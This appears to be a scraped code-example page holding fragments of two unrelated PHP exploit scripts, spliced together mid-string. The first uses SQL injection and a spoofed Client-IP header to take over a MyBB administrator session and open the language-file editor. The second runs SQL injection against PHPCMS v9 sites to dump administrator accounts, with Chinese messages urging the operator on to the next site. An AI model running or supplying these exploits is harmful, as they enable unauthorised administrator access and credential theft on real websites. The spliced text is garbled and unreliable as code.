Example #1
0
#   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
#         ip: 127.0.0.1
#   dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use solution number 2.
# We could also add an administrator (easily), but that is not interesting.
#
# Step 1: recover the administrator's recorded IP and session id through the
# injection helper (sql_inject() is defined elsewhere in this file, not shown here).
print "\nAdmin IP : ";
$ip = sql_inject('ip');
print "\nAdmin sid: ";
$sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";
# The request carries the recovered IP in a Client-IP header; the sample output
# above suggests the target honours that header when it checks the admin session.
# From the defender's side: binding a session to an IP must use the transport
# address, never a client-supplied header such as Client-IP / X-Forwarded-For.
$xpl->addheader('Client-IP', $ip);
$xpl->get($url . "admin/languages.php?adminsid={$sid}");
# Trying to find the language: read the hidden "lang" field from the returned page;
# when no such field is present the script falls back to 'english'.
if (preg_match('#<input type="hidden" name="lang" value="(\\S*)"#', $xpl->getcontent(), $langmatches)) {
    $lang = $langmatches[1];
} else {
    $lang = 'english';
}
print "\nLanguage: {$lang}";
# Language configuration: open the language-file editor for $filetoed (assigned
# earlier, not shown) and collect every textarea name/value pair into $name_value.
# NOTE(review): the pattern uses greedy (.*) without the `s` modifier, so it
# matches within a single line and may over-capture when several textareas
# share one line — confirm against the actual page markup.
$xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}");
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);
# We can't use:
# - <? OR <?php
Example: php ' . $argv[0] . ' http://www.waitalone.cn/
+-------------------------------------------------------------+
    ');
    exit;
}
// Silence every PHP notice/warning so only the script's own output is shown.
// NOTE(review): this also hides transport or parsing failures inside the helpers
// below, so an empty result is not necessarily a patched target.
error_reporting(0);
// Timing: record the start time (func_time() is defined elsewhere in this file, not shown).
$start_time = func_time();
// Target base URL from the command line; the usage check above (cut off here)
// presumably validates that $argv[1] is present.
$phpcmsv9 = $argv[1];
// Normalise the base URL to end with a slash so request paths can be appended directly.
if (substr($phpcmsv9, -1) != '/') {
    $phpcmsv9 .= '/';
}
// Set the cookie first: get_data() below reads this via `global $cookie`, so it
// must be assigned before sql_inject() runs. The PHPSESSID value looks like a
// placeholder the operator is expected to replace — verify.
$cookie = 'PHPSESSID=opphk3ors2sf2m1bqg148fmue5';
// Core step: sql_inject() (defined elsewhere) returns the list of recovered
// administrator account strings; $num is its 0-based index.
$sql_admin = sql_inject();
$count = count($sql_admin);
if ($count != 0) {
    // Result header (Chinese): number of administrator accounts obtained.
    echo '恭喜大爷,成功获取到[ ' . $count . ' ]个管理员账号!' . "\n\n";
    foreach ($sql_admin as $num => $admin) {
        // One line per account, numbered from 1.
        echo '管理员' . ($num + 1) . ' => ' . $admin . PHP_EOL;
    }
} else {
    // Failure message (Chinese): reports the target as already patched and exits.
    exit('杯具了大爷,此站漏洞已经修补,请秒下一个!');
}
//发送数据包函数
function get_data($target)
{
    //控制http发包参数
    global $cookie;
    $opts = array('http' => array('method' => "GET", 'timeout' => 30, 'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0\r\n" . "Cookie: {$cookie}\r\n"));